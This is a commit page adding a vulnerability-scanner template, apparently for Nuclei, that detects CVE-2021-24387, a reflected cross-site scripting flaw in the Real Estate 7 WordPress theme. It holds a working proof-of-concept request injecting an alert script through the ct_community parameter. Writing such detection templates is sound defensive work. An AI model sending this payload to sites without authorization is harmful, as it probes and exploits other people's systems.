Merge pull request #1886 from skar4444/cve-2021-24387
Real Estate 7 WordPress Theme < 3.1.1 - Unauthenticated Reflected XSSpatch-1
commit
5b84b1d3bb
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2021-24387
|
||||
|
||||
info:
|
||||
name: Real Estate 7 WordPress Theme < 3.1.1 - Unauthenticated Reflected XSS
|
||||
author: suman_kar
|
||||
description: XSS in wordpress via ct_community parameter
|
||||
severity: medium
|
||||
tags: cve,cve2021,xss,wordpress
|
||||
reference: https://cxsecurity.com/issue/WLB-2021070041
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
|
||||
Connection: close
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<script>alert(document.domain);</script>'
|
||||
- '/wp-content/themes/realestate'
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue